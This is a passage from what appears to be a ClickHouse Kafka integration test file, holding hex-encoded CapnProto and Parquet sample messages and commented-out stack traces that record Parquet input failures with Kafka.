00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
# 'Parquet' : {
# not working at all with Kafka: DB::Exception: IOError: Invalid Parquet file size is 0 bytes
# /contrib/libcxx/include/exception:129: std::exception::capture() @ 0x15c33fe8 in /usr/bin/clickhouse
# /contrib/libcxx/include/exception:109: std::exception::exception() @ 0x15c33fb5 in /usr/bin/clickhouse
# /contrib/poco/Foundation/src/Exception.cpp:27: Poco::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x21877833 in /usr/bin/clickhouse
# /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:70: DB::ParquetBlockInputFormat::prepareReader() @ 0x1df2b0c2 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:36: DB::ParquetBlockInputFormat::ParquetBlockInputFormat(DB::ReadBuffer&, DB::Block) @ 0x1df2af8b in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ParquetBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, 0ul, 1ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>, std::__1::__tuple_indices<0ul, 1ul>) @ 0x1df2dc88 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ParquetBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ParquetBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>) @ 0x1df2d9c8 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ParquetBlockInputFormat, std::__1::allocator<DB::ParquetBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&>(std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ReadBuffer&, DB::Block const&) @ 0x1df2d687 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ParquetBlockInputFormat>::value), std::__1::shared_ptr<DB::ParquetBlockInputFormat> >::type std::__1::make_shared<DB::ParquetBlockInputFormat, DB::ReadBuffer&, DB::Block const&>(DB::ReadBuffer&, DB::Block const&) @ 0x1df2d455 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # '\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\x
b2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # '\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x
06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
# # '\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\x
